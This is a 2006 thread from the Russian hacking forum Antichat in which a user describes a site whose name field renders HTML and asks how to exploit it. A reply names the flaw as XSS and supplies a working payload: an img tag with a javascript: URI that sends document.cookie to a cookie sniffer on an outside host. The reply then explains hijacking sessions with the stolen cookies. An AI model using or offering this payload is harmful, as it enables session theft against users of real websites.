Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   При вводе имени работают теги! (https://forum.antichat.xyz/showthread.php?t=13802)

Poacher 01.02.2006 16:33

При вводе имени работают теги!
 
Здрасти есть один сайт. При вводе имени в форму <form> можно вводить теги и они работают, а при попытке вводить (примерно) <? echo data("s = h = m")?> в тексте оказывается слеши перед кавычками <? echo data(/"s = h = m/")?> и ни че не работает, а простые теги html работают все!

Суть вопроса: на сколько опасна данная уязвимость, и как её лутше использовать.

Utochka 01.02.2006 16:54

В умелых руках уязвимость довольно опасна! Это так называемая XSS.

пишешь что то типа
<img src=javascript:aa=new&#x20;Image();aa.src=&quot;ht tp://antichat.ru/cgi-bin/s.gif?&quot;+document.cookie;>
и если все пройдет ok на antichat'овский снифер придут куки. Дальше ты свои заменяешь на угнанные куки и юзаешь их по назначению. =)


Время: 19:35